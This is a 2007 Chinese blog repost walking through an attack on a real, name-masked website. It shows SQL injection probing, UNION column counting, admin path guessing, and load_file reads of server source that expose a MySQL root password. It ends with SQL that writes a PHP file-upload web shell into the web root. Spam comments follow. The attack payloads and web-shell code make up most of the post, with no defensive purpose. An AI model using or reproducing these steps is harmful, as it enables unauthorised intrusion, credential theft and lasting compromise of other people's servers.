推荐日志

记一次安全检测的全部过程

[ 2007-03-25 03:57:56 | 作者: sun ]
字体大小: | |
copy from 至尊宝's Blog

>>>>>>记一次安全检测<<<<<<

测试站点如下

http://www.******.com

找个踩点

http://www.******.com/zhaobiao/zhaobiao_hy_show.php?id=149830

提交一个 &#39;

返回结果

Warning: mysql_result(): supplied argument is not a valid MySQL result resource in

/var/www/html/zhaobiao/zhaobiao_hy_show.php on line 135

Warning: mysql_result(): supplied argument is not a valid MySQL result resource in

/var/www/html/zhaobiao/zhaobiao_hy_show.php on line 140

Warning: mysql_result(): supplied argument is not a valid MySQL result resource in

/var/www/html/zhaobiao/zhaobiao_hy_show.php on line 154

路径出来了,继续安检.

http://www.******.com/zhaobiao/zhaobiao_hy_show.php?id=149830&#39;and 1=1 #

返回错误,不是字符型.

注明:%23是#

提交 and 1=1 返回正常

提交 and 1=2 返回不正常

接下来就是 union 语句

and 1=1 union sel&#101;ct 1 返回不正常

and 1=1 union sel&#101;ct 1,2 返回不正常

and 1=1 union sel&#101;ct 1,2,3 返回不正常

and 1=1 union sel&#101;ct 1,2,3,4 返回不正常

and 1=1 union sel&#101;ct 1,2,3,4,5 返回不正常

and 1=1 union sel&#101;ct 1,2,3,4,5,6 返回不正常

and 1=1 union sel&#101;ct 1,2,3,4,5,6,7 返回不正常

and 1=1 union sel&#101;ct 1,2,3,4,5,6,7,8 返回不正常

and 1=1 union sel&#101;ct 1,2,3,4,5,6,7,8,9 返回不正常

and 1=1 union sel&#101;ct 1,2,3,4,5,6,7,8,9,10 返回不正常

and 1=1 union sel&#101;ct 1,2,3,4,5,6,7,8,9,10,11 返回不正常

and 1=1 union sel&#101;ct 1,2,3,4,5,6,7,8,9,10,11,12 返回不正常

and 1=1 union sel&#101;ct 1,2,3,4,5,6,7,8,9,10,11,12,13 返回不正常

and 1=1 union sel&#101;ct 1,2,3,4,5,6,7,8,9,10,11,12,13,14 返回正常

猜到 14 就正常了 继续下一步.

一般这样的站点基本上后台是不可能那么容易让我们找到的..

还是先看看有没有再说吧..

猜猜常用的路径.

login.php
admin.php
admin_login.php
admin_index.php
admin/login.php
admin/admin.php
admin/admin_login.php
admin/admin_index.php
manage/index.php
manage/login.php
manage/admin_login.php
manage/admin_index.php

等等.有耐心的可以慢慢去猜.就算猜到了也没什么用.

我们还是用比较直接的方法吧.直接用 load_file 读取文件内容

http://www.******.com/zhaobiao/zhaobiao_hy_show.php?id=149830 and 1=1 union sel&#101;ct 1,2,3,4,5,6,7,8,9,10,11,12,13,14

http://www.******.com/zhaobiao/zhaobiao_hy_show.php?id=149830 and 1=2 union sel&#101;ct 1,2,3,4,5,6,7,8,9,10,11,12,13,14
里面的 and 1=1 变成 and 1=2

返回结果如下:

2

就在2的位置暴了我们需要的文件内容.

我们就从 /var/www/html/zhaobiao/zhaobiao_hy_show.php

直接用 load_file(&#39;/var/www/html/zhaobiao/zhaobiao_hy_show.php&#39;)

前提是要把 /var/www/html/zhaobiao/zhaobiao_hy_show.php 转换成 16 进制

http://www.******.com/zhaobiao/zhaobiao_hy_show.php?id=149830 and 1=2 union sel&#101;ct 1,load_file

(0x2F7661722F7777772F68746D6C2F7A68616F6269616F2F7A68616F6269616F5F68795F73686F772E706870),3,4,5,6,7,8,9,10,11,12,13,14

返回结果

0 o&#114; $regdate>mysql_result($query,0,&#39;yxdate&#39;)){?>

  ",mysql_result($query,0,&#39;sm&#39;));?>

不要管这些,直接查看源文件找到了一个 inc.php 的文件 然后配合前面的路径

/var/www/html/inc.php

http://www.******.com/zhaobiao/zhaobiao_hy_show.php?id=149830 and 1=2 union sel&#101;ct 1,load_file

(0x2F7661722F7777772F68746D6C2F696E632E706870),3,4,5,6,7,8,9,10,11,12,13,14

暴一下 返回看不到内容 直接查看源文件

<?
$myconn=mysql_connect(&#39;localhost&#39;,&#39;root&#39;,&#39;www.******.comy0p5h1i0&#39;);
mysql_sel&#101;ct_db(&#39;mlk&#39;);
?>

Mysql 直接暴出来了..

下一步就是登陆 Mysql 然后插入自己准备好的小马..

use mlk;
cr&#101;ate table mmxy (cmd TEXT);
ins&#101;rt into mmxy values(&#39;<?php&#39;);
ins&#101;rt into mmxy values(&#39;$msg = copy($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]) ? "Successful" : "failure";&#39;);
ins&#101;rt into mmxy values(&#39;echo $msg;&#39;);
ins&#101;rt into mmxy values(&#39;?>&#39;);
ins&#101;rt into mmxy values(&#39;<form ENCTYPE="multipart/form-data" ACTION="" METHOD="POST">&#39;);
ins&#101;rt into mmxy values(&#39;<input NAME="MyFile" TYPE="file">&#39;);
ins&#101;rt into mmxy values(&#39;<input VALUE="Up" TYPE="submit"></form>&#39;);
sel&#101;ct * from mmxy into outfile &#39;/var/www/html/zhaobiao/mmxy.php&#39;;
评论Feed 评论Feed: http://www.lziss.com/blog/feed.asp?q=comment&id=418
UTF-8 Encoding 引用链接: http://www.lziss.com/blog/trackback.asp?id=418

浏览模式: 显示全部 | 评论: 2 | 引用: 0 | 排序 | 浏览: 1541
引用 wtc542*
[ 2007-09-19 06:56:05 ]
卢克瑞卢克瑞卢克瑞卢克瑞卢克瑞卢克瑞卢克瑞卢克瑞卢克瑞卢克瑞卢克瑞卢克瑞卢克瑞卢克瑞卢克瑞卢克瑞卢克瑞卢克瑞卢克瑞卢克瑞卢克瑞卢克瑞卢克瑞卢克瑞卢克瑞卢克瑞卢克瑞卢克瑞卢克瑞卢克瑞卢克瑞卢克瑞卢克瑞卢克瑞卢克瑞卢克瑞卢克瑞卢克瑞卢克瑞卢克瑞卢克瑞卢克瑞卢克瑞卢克瑞卢克瑞卢克瑞卢克瑞卢克瑞卢克瑞卢克瑞卢克瑞卢克瑞卢克瑞卢克瑞卢克瑞卢克瑞卢克瑞卢克瑞卢克瑞卢克瑞卢克瑞卢克瑞卢克瑞卢克瑞卢克瑞卢克瑞卢克瑞卢克瑞卢克瑞卢克瑞卢克瑞卢克瑞卢克瑞卢克瑞卢克瑞卢克瑞卢克瑞卢克瑞卢克瑞卢克瑞卢克瑞
引用 ysx766*
[ 2007-12-04 11:35:40 ]
上海派爱商务咨询有限公司
经营范围:商务咨询、企业管理咨询、投资咨询、市场策划、展览展示服务、劳动服务。
并可以为贵公司提供高质量网站建设及网站优化、产品推广服务


公司本次发布信息内容:食品、饮料、酒类、调味品等企业。如果有需要本公司进行产品投放市场前期
的策划,寻找代理商家,可以与我公司联系。

在本月10日以前联系的公司将可以安排贵公司产品参加11月份的华联超市全国订货会。

联系方式:电话 021--51021055-3
E-mail: sh-pai@hotmail,com.

联 系 人:邵先生

发表
表情图标
[1] [2] [3] [4]
[5] [6] [7] [8]
[9] [10] [11] [12]
[13] [14] [15] [16]
[17] [18] [19] [20]
[21] [22] [23] [24]
[25] [26] [27] [28]
[29] [30] [31] [32]
[33] [34] [35]
UBB代码
转换链接
表情图标
悄悄话
用户名:   密码:   注册?